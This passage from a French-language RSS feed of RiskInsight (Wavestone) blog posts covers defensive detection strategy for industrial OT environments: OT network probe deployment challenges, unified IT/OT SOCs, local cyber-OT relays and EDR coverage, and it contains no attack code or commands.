<p><img loading="lazy" decoding="async" class="wp-image-28095 size-full aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_fr4-e1761832775338.png" alt="" width="1280" height="475" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_fr4-e1761832775338.png 1280w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_fr4-e1761832775338-437x162.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_fr4-e1761832775338-71x26.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_fr4-e1761832775338-768x285.png 768w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></p>
<p>Voici les défis fréquemment rencontrés lors du déploiement des sondes OT :</p>
<ul>
<li><strong>Défis liés aux capacités et aux ressources du réseau des sites industriels :</strong> Le déploiement des sondes OT présente souvent des défis significatifs en raison des limites de l’infrastructure réseau industrielle. Les taps réseau et les ports SPAN sur les commutateurs, couramment utilisés pour la surveillance du trafic, ne sont pas toujours manageables ou disponibles dans les environnements OT, ce qui limite les options de capture de trafic passif. De plus, les coûts associés à l’installation de taps réseau peuvent être prohibitifs. Enfin, le déploiement et la maintenance des sondes exigent des ressources qualifiées sur place.</li>
<li><strong>Défis liés à la sélection des points d’écoute :</strong> Les sondes OT collectent et corrèlent l’information via la capture de trafic réseau. Pour être efficace, leur déploiement nécessite une sélection minutieuse des points d’écoute en fonction des cibles visées. Les points d’écoute doivent être adaptés à l’architecture de chaque site, un processus souvent limité par les connaissances des équipes locales et le manque de documentation. De plus, comme les environnements industriels varient d’un site à l’autre au sein d’une même organisation, il est très difficile d’établir un <strong>standard unique</strong>. Par conséquent, la sélection et la configuration des points d’écoute constituent un processus répétitif et itératif qui doit être ajusté pour chaque déploiement afin de garantir une visibilité et des capacités de détection optimales.</li>
</ul>
<p>Au-delà du déploiement, l&rsquo;exploitation de ces sondes s&rsquo;accompagne également de défis et exige une <strong>charge de travail significative</strong>. Elles ont tendance à générer un nombre élevé de faux positifs, ce qui oblige les équipes à créer des règles de détection et des playbooks sur mesure pour filtrer et répondre efficacement aux alertes. En moyenne, nous estimons <strong>qu&rsquo;un analyste SOC à temps plein</strong> est requis pour gérer les alertes générées par <strong>50 sondes.</strong></p>
<p><span data-teams="true">En conclusion, bien que les sondes OT soient populaires, <strong>les coûts et les ressources nécessaires à leur déploiement et à leur exploitation limitent leur pleine utilisation</strong>. Notre recommandation est de prioriser le déploiement des sondes OT sur les sites critiques ou au sein des segments réseau clés qui exigent des capacités avancées de surveillance industrielle. Cette approche ciblée permet de maximiser le retour sur investissement tout en garantissant une détection efficace là où elle est essentielle pour nos clients.</span></p>
<h3>Envisager d’autres solutions ?</h3>
<p><span data-teams="true">Concernant la détection pour le périmètre industriel, bien que cet article se concentre sur des sources clés comme les solutions EDR et les sondes réseau OT, il est important de reconnaître que d’autres solutions, telles que les technologies de leurre comme les honeypots, <strong>peuvent également jouer un rôle précieux</strong> et être pertinentes dans des scénarios ou environnements spécifiques, en fonction de l’architecture de vos sites industriels ou <strong>des scénarios de compromission redoutés.</strong></span></p>
<h1>Conclusion</h1>
<p>Pour conclure, voici les recommandations clés pour élaborer une stratégie d’outillage de détection efficace pour mettre sous surveillance des environnements industriels :</p>
<ol>
<li><strong><span class="TextRun SCXW224367835 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW224367835 BCX0">Tirez parti des outils existants pour un impact immédiat</span></span></strong></li>
</ol>
<p>Commencez par maximiser la valeur <strong>des sources de détection déjà disponibles</strong> dans votre environnement industriel : logs de pare-feu, EDR, Active Directory, logs d&rsquo;accès <span data-teams="true">distant</span>, etc. <span data-teams="true">L’adaptation à l&rsquo;OT des patterns <strong>de détection IT</strong> éprouvés permet aux organisations d’atteindre rapidement un niveau de visibilité de base sans nécessiter d&rsquo;investissements lourds. Cette première approche garantie un déploiement plus rapide et une couverture plus large de vos assets industriels.</span></p>
<ol start="2">
<li><strong>Déployer des solutions avancées là où elles sont pertinentes</strong></li>
</ol>
<p><span class="TextRun SCXW264573278 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW264573278 BCX0">Lorsque vous étendez vos capacités de détection, donnez la priorité au déploiement d&rsquo;outils avancés tels que les </span></span><strong><span class="TextRun SCXW264573278 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW264573278 BCX0">sondes réseau</span></span></strong><span class="TextRun SCXW264573278 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW264573278 BCX0"> OT là où ils apportent le plus de </span><span class="NormalTextRun SCXW264573278 BCX0">valeur</span><span class="NormalTextRun SCXW264573278 BCX0">. Pour les </span><span class="NormalTextRun SCXW264573278 BCX0">sondes réseau</span><span class="NormalTextRun SCXW264573278 BCX0">, concentrez-vous sur les sites ou segments critiques et sélectionnez soigneusement les </span></span><strong><span class="TextRun SCXW264573278 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW264573278 BCX0">points d&rsquo;écoute</span></span></strong><span class="TextRun SCXW264573278 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW264573278 BCX0"> afin </span><span class="NormalTextRun SCXW264573278 BCX0">d’optimiser </span><span class="NormalTextRun SCXW264573278 BCX0">la visibilité, le coût et les frais généraux opérationnels. Cette approche de déploiement ciblée garantit une utilisation efficace et stratégique des ressources.</span></span></p>
<ol start="3">
<li><strong>Prioriser la qualité et la pertinence plutôt que la quantité</strong></li>
</ol>
<p><span class="TextRun SCXW34349626 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW34349626 BCX0">Pour élaborer une stratégie de détection OT efficace, il n&rsquo;est pas nécessaire d</span><span class="NormalTextRun SCXW34349626 BCX0">’écouter </span><span class="NormalTextRun SCXW34349626 BCX0">toutes les sources de données possibles. Concentrez-vous plutôt sur les sources qui sont à la fois pertinentes pour votre environnement et techniquement exploitables</span><span class="NormalTextRun SCXW34349626 BCX0">,</span><span class="NormalTextRun SCXW34349626 BCX0"> sans perturber les opérations. Cette approche permet de réduire les coûts de stockage et de gestion des journaux et de créer des règles de détection pertinentes et de meilleure qualité. </span></span><span class="EOP SCXW34349626 BCX0" data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p>N&rsquo;hésitez pas à nous contacter pour discuter de la manière dont vous pouvez <strong>élaborer et améliorer votre stratégie de détection pour surveiller vos actifs industriels !</strong></p>
<p>Dans notre prochain article, nous examinerons comment évaluer la détection en environnements industriels en utilisant <strong>des exercices de purple team</strong>, une méthode pratique pour <span class="TextRun SCXW124424191 BCX0" lang="FR-FR" xml:lang="FR-FR" data-contrast="auto"><span class="NormalTextRun SCXW124424191 BCX0">évaluer et améliorer</span></span> vos capacités de détection.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/10/strategie-doutillage-cybersecurite-pour-une-detection-industrielle-efficace/">​​Stratégie d’outillage cybersécurité pour une détection industrielle efficace​</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/10/strategie-doutillage-cybersecurite-pour-une-detection-industrielle-efficace/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>​Quelle détection pour l’OT ?  Situation actuelle &#038; perspectives</title>
		<link>https://www.riskinsight-wavestone.com/2025/09/quelle-detection-pour-lot-situation-actuelle-perspectives/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/09/quelle-detection-pour-lot-situation-actuelle-perspectives/#respond</comments>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Thu, 25 Sep 2025 11:17:18 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=27716</guid>

					<description><![CDATA[<p>L’OT, moins exposé mais plus vulnérable   L’OT, bien que globalement moins touché que l’IT, n’est pas exempt de cybermenaces. Voici une vue simplifiée de ces principales menaces :   Hacktivisme : Les tensions géopolitiques accrues en 2025 ont entraîné des attaques...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/09/quelle-detection-pour-lot-situation-actuelle-perspectives/">​Quelle détection pour l’OT ?  Situation actuelle &amp; perspectives</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h1><span data-contrast="none">L’OT, moins exposé mais plus vulnérable </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:360,&quot;335559739&quot;:80}"> </span></h1>
<p><span data-contrast="auto">L’OT, bien que globalement moins touché que l’IT, n’est pas exempt de cybermenaces. Voici une vue simplifiée de ces principales menaces : </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li><b><span data-contrast="auto">Hacktivisme</span></b><span data-contrast="auto"> : Les tensions géopolitiques accrues en 2025 ont entraîné des attaques de faible intensité par des groupes comme CyberArmyofRussia_Reborn et CyberAv3ngers. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Cybercriminalité / Ransomware</span></b><span data-contrast="auto"> : Une augmentation de 87 % des attaques par ransomware dans les groupes industriels a été constatées en 2025 d’après les chiffres de Dragos dans son </span><a href="https://www.dragos.com/ot-cybersecurity-year-in-review/?utm_source=press%20release&amp;utm_medium=organic&amp;utm_campaign=2025_year_in_review_full_report_organic"><span data-contrast="none">rapport annuel</span></a><span data-contrast="auto">. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Menaces étatiques</span></b><span data-contrast="auto"> : On note les campagnes récentes telles que Voltzite (vol d’informations OT) ou IOControl.</span></li>
</ul>
<p><span data-contrast="auto">Ce panorama des menaces a notamment été dépeint par Chris Sistrunk, ICS/OT Technical Leader chez Mandiant, Google Cloud Security, lors de la Black Hat 2025</span><span data-contrast="auto"> </span><span data-contrast="auto">: </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> <img loading="lazy" decoding="async" class="wp-image-27770 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_EN14.png" alt="" width="716" height="391" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_EN14.png 958w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_EN14-350x191.png 350w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_EN14-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_EN14-768x419.png 768w" sizes="auto, (max-width: 716px) 100vw, 716px" /></span></p>
<p><span data-contrast="auto">Face à l’augmentation des menaces ciblant les environnements OT, leur surveillance continue est devenue essentielle. Les systèmes d’information industriels doivent être étroitement surveillés, et nous savons que nos clients y travaillent activement. Mais une question demeure : </span><b><span data-contrast="auto">comment mesurer l’efficacité de la détection en environnement industriel, et surtout, comment l’améliorer ?</span></b><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h1><span data-contrast="none">Comment mesurer et améliorer l’efficacité de la détection en environnement industriel</span><b><span data-contrast="none"> ?</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:360,&quot;335559739&quot;:80}"> </span></h1>
<p><span data-contrast="auto">Pour répondre à cette question, nous avons élaboré une méthodologie visant à évaluer les capacités de détection au sein des SOC industriels. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Cette évaluation s’articule autour des </span><b><span data-contrast="auto">activités clés d’un SOC</span></b><span data-contrast="auto">, réparties en quatre grands piliers : gouvernance &amp; stratégie, prévention, détection et réponse.</span></p>
<p><img loading="lazy" decoding="async" class=" wp-image-27744 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR1.png" alt="" width="751" height="373" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR1.png 1153w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR1-384x191.png 384w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR1-71x35.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR1-768x382.png 768w" sizes="auto, (max-width: 751px) 100vw, 751px" /></p>
<p><span data-contrast="auto">En nous appuyant sur cette méthode, </span><b><span data-contrast="auto">nous avons évalué une quinzaine de clients industriels</span></b><span data-contrast="auto"> afin de mieux comprendre leur niveau de maturité. Dans cet article, nous partageons les </span><b><span data-contrast="auto">principales tendances qui en ont émergé</span></b><span data-contrast="auto">, en nous concentrant spécifiquement sur les questions liées à la détection. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Deux articles complémentaires seront publiés : l’un dédié à l’efficacité des différentes stratégies et solutions de détection, et l’autre aux méthodes de test des capacités de détection dans des environnements industriels à l’aide d’exercices de purple teaming et des modules dédiés que nous avons développés. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h2 aria-level="2"><span data-contrast="none">Gouvernance et Stratégie </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p><span data-contrast="auto">La première question sur laquelle nous nous sommes concentrés était de savoir si la supervision des sites et environnements industriels est assurée par une équipe dédiée utilisant des outils spécifiques ou si, au contraire, elle est intégrée dans une approche d’un SOC unique et centralisé. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Les réponses sont unanimes : </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none"><img loading="lazy" decoding="async" class="wp-image-27782 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR2-1.png" alt="" width="827" height="126" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR2-1.png 1182w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR2-1-437x67.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR2-1-71x11.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR2-1-768x117.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR2-1-1170x180.png 1170w" sizes="auto, (max-width: 827px) 100vw, 827px" /></span></p>
<p><span data-contrast="auto">Ces chiffres peuvent s’expliquer par plusieurs facteurs. L’une des principales raisons est l’</span><b><span data-contrast="auto">optimisation financière</span></b><span data-contrast="auto">. Maintenir deux équipes distinctes aux compétences et rôles similaires</span><span data-contrast="auto"> </span><span data-contrast="auto">: gestion des alertes, configuration des outils … représente un coût important. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Cependant, un SOC unifié implique généralement une </span><b><span data-contrast="auto">extension du périmètre de son SOC IT</span></b><span data-contrast="auto"> pour inclure l’OT, sans pour autant garantir la présence d’outils ou d’expertises spécifiques à l’OT, et donc de véritables capacités de détection pour couvrir les environnements industriels. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Même si cette approche ne garantit pas une détection et une réponse efficace sur l’ensemble du périmètre industriel, un SOC unifié peut tout de même gérer efficacement les incidents OT, à condition de :</span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h3 aria-level="3"><span data-contrast="none">Assurer supervision de bout en bout </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h3>
<p><span data-contrast="auto">En examinant de plus près le paysage simplifié des menaces, on constate que les cyberattaques ne sont pas forcément spécifiques à l’IT ou à l’OT (hacktivisme, ransomware …). </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Les ransomwares par exemple, qui représentent toujours aujourd’hui la principale menace, ne se limitent pas à un environnement industriel ou bureautique. Ils se propagent souvent à travers les deux, rendant indispensable le suivi des alertes de bout en bout. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Ainsi, unifier les équipes et les outils de détection fait sens, puisque </span><b><span data-contrast="auto">les attaques ne se limitent pas à l’IT ou OT.</span></b><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h3 aria-level="3"><span data-contrast="none">Faire le lien avec les sites industriels</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h3>
<p><span data-contrast="auto">En cas d’incident cyber, le temps de réponse et le partage d’informations est essentiel. Comme la plupart des équipes de sécurité sont centralisées en un seul lieu, il est </span><b><span data-contrast="auto">nécessaire d’établir un lien, au travers d’un relais cyber local, entre ces équipes centrales et les sites industriels locaux</span></b><span data-contrast="auto"> dans le processus de gestion des incidents cyber : </span><span data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Ce relais connaît bien les sites industriels, leurs caractéristiques, contexte opérationnel et modes de fonctionnement. </span><span data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li><span data-contrast="auto">Il maintient également un contact direct sur site pour recueillir rapidement les informations nécessaires au triage, ou à l’investigation. </span><span data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li><span data-contrast="auto">De plus, dans les organisations globales, disposer de ressources situées dans les bons fuseaux horaires et capables de communiquer dans la langue locale est indispensable, en particulier dans le monde industriel. </span><span data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">Appelés dans le schéma ci-dessous des « référents Cyber-OT », ces relais jouent un </span><b><span data-contrast="auto">rôle actif dans le processus de résolution des incidents</span></b><span data-contrast="auto">, en particulier durant les phases d’investigation et de remédiation :</span></p>
<p><span data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-27748 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR3.png" alt="" width="1194" height="510" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR3.png 1194w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR3-437x187.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR3-71x30.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR3-768x328.png 768w" sizes="auto, (max-width: 1194px) 100vw, 1194px" /></span></p>
<p><span data-contrast="auto">En conclusion, bien que ces </span><b><span data-contrast="auto">SOC unifiés couvrant à la fois les périmètres IT et l’OT</span></b><span data-contrast="auto"> résultent généralement d’un besoin d’optimisation des coûts, ce modèle fait sens dans la mesure où de nombreuses menaces concernent les deux environnements. Toutefois, il ne faut pas considérer un SOC unifié comme une simple extension du périmètre à couvrir : des </span><b><span data-contrast="auto">relais OT dédiés</span></b><span data-contrast="auto"> et une expertise spécifique </span><b><span data-contrast="auto">sont indispensables pour adresser efficacement les environnements industriels</span></b><span data-contrast="auto">.</span><span data-ccp-props="{}"> </span></p>
<h2 aria-level="3"><span data-contrast="none">Outillage et solution de détection </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p><span data-contrast="auto">En ce qui concerne les solutions de détection, nous avons constaté que 100 % de nos clients disposent d’outils de détection déployés côté IT. Cependant, seulement un tiers étend la supervision jusqu’aux couches inférieures de l’environnement industriel. </span><span data-ccp-props="{}"> </span></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-27750 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR4.png" alt="" width="688" height="472" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR4.png 688w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR4-278x191.png 278w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR4-57x39.png 57w" sizes="auto, (max-width: 688px) 100vw, 688px" /></p>
<p><span data-contrast="auto">Nous nous concentrerons par la suite sur les solutions les plus populaires pour adresser la détection dans les environnements industriels : les EDR et les sondes OT. </span><span data-ccp-props="{}"> </span></p>
<h3 aria-level="3"><span data-contrast="none">EDR </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h3>
<p><span data-contrast="auto">Quelques chiffres concernant les EDR :</span><span data-ccp-props="{}"> </span><span data-ccp-props="{}"> </span></p>
<p><img loading="lazy" decoding="async" class=" wp-image-27752 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR5.png" alt="" width="626" height="156" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR5.png 823w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR5-437x109.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR5-71x18.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR5-768x191.png 768w" sizes="auto, (max-width: 626px) 100vw, 626px" /></p>
<p><span data-contrast="auto">La plupart de nos clients ont commencé à déployer des EDR dans leurs environnements industriels. Cependant, cela ne signifie pas que 100 % des machines industrielles compatibles avec les EDRs sont couvertes. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Pour les environnements qui le permettent, étendre la couverture EDR permet de : </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Répondre à une maturité faible : commencer par des outils simples à déployer et qui ne nécessitent pas de connaissances avancées de l&rsquo;architecture des sites. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li><span data-contrast="auto">Assurer une couverture large spectre : se concentrer sur la couverture rapide d’un large éventail de systèmes, de sites et d’applications critiques. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li><span data-contrast="auto">Tirer parti des solutions de l’IT : utiliser des solutions IT comme les EDRs pour une détection efficace sans nécessiter d’adaptation majeure des équipes SOC. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">Pour cette dernière raison, la plupart des organisations choisissent d’utiliser la même solution EDR pour les environnements IT et OT. Cela permet un déploiement plus rapide grâce à un outil connu et déjà intégré. Selon les besoins et les ressources disponibles, une </span><b><span data-contrast="auto">solution différente</span></b><span data-contrast="auto"> peut toutefois être sélectionnée afin d’améliorer la </span><b><span data-contrast="auto">résilience et la compatibilité OT</span></b><span data-contrast="auto">.</span></p>
<p><img loading="lazy" decoding="async" class=" wp-image-27754 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR6.png" alt="" width="742" height="234" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR6.png 831w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR6-437x138.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR6-71x22.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR6-768x242.png 768w" sizes="auto, (max-width: 742px) 100vw, 742px" /></p>
